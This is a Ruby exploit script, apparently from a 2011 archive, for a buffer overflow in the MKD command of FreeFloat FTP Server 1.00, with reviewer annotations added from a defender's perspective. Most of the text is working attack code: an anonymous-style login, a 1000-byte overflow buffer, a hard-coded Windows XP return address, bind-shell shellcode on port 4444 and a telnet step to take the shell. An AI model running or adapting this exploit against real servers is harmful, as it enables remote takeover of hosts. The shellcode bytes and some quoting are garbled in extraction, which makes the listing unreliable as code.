
FreeFloat FTP Server 1.00 MKD Buffer Overflow

Posted on 17 July 2011

#!/usr/bin/ruby
#
# [+] Exploit Title: FreeFloat FTP Server MKD Buffer Overflow Exploit
# [+] Date: 1662011   (as given on the page; the date separators appear to have been lost in extraction)
# [+] Author: C4SS!0 G0M3S
# [+] Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# [+] Version: 1.00
# [+] Tested On: Windows XP SP3 Brazilian
# [+] CVE: N/A
#
# NOTE(review): historical (2011) proof-of-concept preserved as published.
# The listing was flattened by extraction: the byte escapes inside the payload
# strings and the escaped quotes in the final print have lost their backslashes,
# so this text does not run as-is. It is left untouched here.
#
# What the script shows, read from the defender's side:
#   * the trigger is one FTP MKD command whose argument is padded to 1000 bytes
#     (see `buf` below), sent after a USER/PASS login with "test"/"test"; an
#     MKD argument of that length is the network-visible signature;
#   * the return address 0x7C874413 is hard-coded for the stated test platform
#     (kernel32.dll on Windows XP SP3), so the payload is tied to that build;
#   * the payload is labelled a bind shell on TCP 4444 and the last step of the
#     script connects to it with telnet, so an unexpected listener on 4444 on
#     an FTP host is the post-exploitation indicator.
#
require 'socket'

# Prints the ASCII banner. The text is a single runtime string literal and is
# kept byte-for-byte; adjacent "" "..." "" literals concatenate in Ruby.
def banner()
print """ ================================================================= ================================================================= ==========FreeFloat FTP Server MKD Buffer Overflow Exploit======= ==========Autor C4SS!0 G0M3S===================================== ==========E-mail louredo_@hotmail.com============================ ================================================================= ================================================================= """
end

# Delivers the overflow: logs in, sends MKD with the oversized argument, then
# reconnects once after a one-second pause and closes (purpose of the second
# connect is not stated).
#   buf   -- payload string assembled at top level
#   ip    -- target host
#   porta -- target port; to_i is applied only on the first connect (the
#            caller already passes an Integer, so the second connect works too)
# The bare rescue catches every StandardError, prints it and exits with
# status 0, so a connection failure is reported to the shell as success.
def exploit(buf,ip,porta)
begin
s = TCPSocket.new(ip,porta.to_i)
s.recv(20000)                                   # blocking read of the greeting; no timeout
s.puts "USER test "
s.recv(2000)
s.puts "PASS test "
s.recv(2000)
s.puts "MKD #{buf} "                            # the overflow trigger
s.close
s = TCPSocket.new(ip,porta)
sleep(1)
s.close
rescue
print " [*]Error: #{$!} "
exit(0)                                         # exit status 0 even on failure
end
end

# Console cosmetics only. NOTE(review): on a non-Windows host `ver` normally
# does not exist, and a backtick call to a missing command raises
# Errno::ENOENT rather than returning a string -- confirm; if so, the
# `else` branch is never reached on such hosts.
sys = `ver`
if sys=~/Windows/
system("cls")
system("color 4f")
system("title FreeFloat FTP Server MKD Buffer Overflow Exploit")
else
system("clear")
end

# Usage check looks only at the port argument; exits 0 on a usage error.
if not ARGV[1]
banner()
print " [-]Usage: ruby #{$0} <Host> <Port> "
print " [-]Exemple: ruby #{$0} 192.168.1.2 21 "
exit(0)
end

banner()
host = ARGV[0]
porta = ARGV[1].to_i

# The string below contains a literal line break (the original "\n" escape
# survived extraction as a real newline).
print " [+]Connecting to Server "+host+"... 
"
sleep(1)

# Fingerprint step: reads the FTP greeting and matches it against the product
# banner. NOTE(review): the parentheses around "Version 1.00" are unescaped in
# this text, which makes them a regex group rather than literal characters --
# most likely another lost backslash from extraction.
begin
sock = TCPSocket.new(host,porta)
print " [+]Checking if server is vulnerable "
sleep(1)
c = sock.recv(2000)
rescue
print " [*]Error:#{$!} "
exit(0)
end
unless c =~/FreeFloat Ftp Server (Version 1.00)/
print " [+]Server Not Vulnerable:( "
sleep(1)
exit(0)
end
sock.close
print " [+]Server Vulnerable:) "
sleep(1)
print " [+]Running Buffer Overflow Attacks "
sleep(1)

# Payload bytes, kept exactly as printed on the page (escapes garbled).
shellcode = "x33xc9x83xe9xaaxe8xffxffxffxffxc0x5ex81x76x0e"+
"xbbxc1x9cx35x83xeexfcxe2xf4x47x29x15x35xbbxc1"+
"xfcxbcx5exf0x4ex51x30x93xacxbexe9xcdx17x67xaf"+
"x4axeex1dxb4x76xd6x13x8ax3exadxf5x17xfdxfdx49"+
"xb9xedxbcxf4x74xccx9dxf2x59x31xcex62x30x93x8c"+
"xbexf9xfdx9dxe5x30x81xe4xb0x7bxb5xd6x34x6bx91"+
"x17x7dxa3x4axc4x15xbax12x7fx09xf2x4axa8xbexba"+
"x17xadxcax8ax01x30xf4x74xccx9dxf2x83x21xe9xc1"+
"xb8xbcx64x0exc6xe5xe9xd7xe3x4axc4x11xbax12xfa"+ # Shellcode Bing Shell LPORT=4444 (author's label)
"xbexb7x8ax17x6dxa7xc0x4fxbexbfx4ax9dxe5x32x85"+
"xb8x11xe0x9axfdx6cxe1x90x63xd5xe3x9exc6xbexa9"+
"x2ax1ax68xd3xf2xaex35xbbxa9xebx46x89x9exc8x5d"+
"xf7xb6xbax32x44x14x24xa5xbaxc1x9cx1cx7fx95xcc"+
"x5dx92x41xf7x35x44x14xccx65xebx91xdcx65xfbx91"+
"xf4xdfxb4x1ex7cxcax6ex48x5bx04x60x92xf4x37xbb"+
"xd0xc0xbcx5dxabx8cx63xecxa9x5exeex8cxa6x63xe0"+
"xe8x96xf4x82x52xf9x63xcax6ex92xcfx62xd3xb5x70"+
"x0ex5ax3ex49x62x32x06xf4x40xd5x8cxfdxcax6exa9"+
"xffx58xdfxc1x15xd6xecx96xcbx04x4dxabx8ex6cxed"+
"x23x61x53x7cx85xb8x09xbaxc0x11x71x9fxd1x5ax35"+
"xffx95xccx63xedx97xdax63xf5x97xcax66xedxa9xe5"+
"xf9x84x47x63xe0x32x21xd2x63xfdx3exacx5dxb3x46"+
"x81x55x44x14x27xc5x0ex63xcax5dx1dx54x21xa8x44"+
"x14xa0x33xc7xcbx1cxcex5bxb4x99x8exfcxd2xeex5a"+
"xd1xc1xcfxcax6exc1x9cx35"

# Buffer layout as published: filler, return address, nop sled, payload,
# then filler again so the MKD argument is exactly 1000 bytes long.
buf = "x41" * 247
buf += [0x7C874413].pack('V')   # JMP ESP IN kernel32.dll (author's comment; XP SP3 specific)
buf += "x90" * 20               # nop sled
buf += shellcode
buf += "x41" * (1000-buf.length)

exploit(buf,host,porta)
# Printed unconditionally: exploit() either returns or exits, so this message
# does not mean the overflow actually succeeded.
print " [+]Attack Buffer Overflow Successfully Executed "
sleep(1)
# NOTE(review): the inner quotes around the telnet command were escaped in
# the original; as extracted this line is not valid Ruby. Kept as printed.
print " [+]Running telnet command: "telnet #{host} 4444" "
sleep(2)
system("telnet #{host} 4444")

 
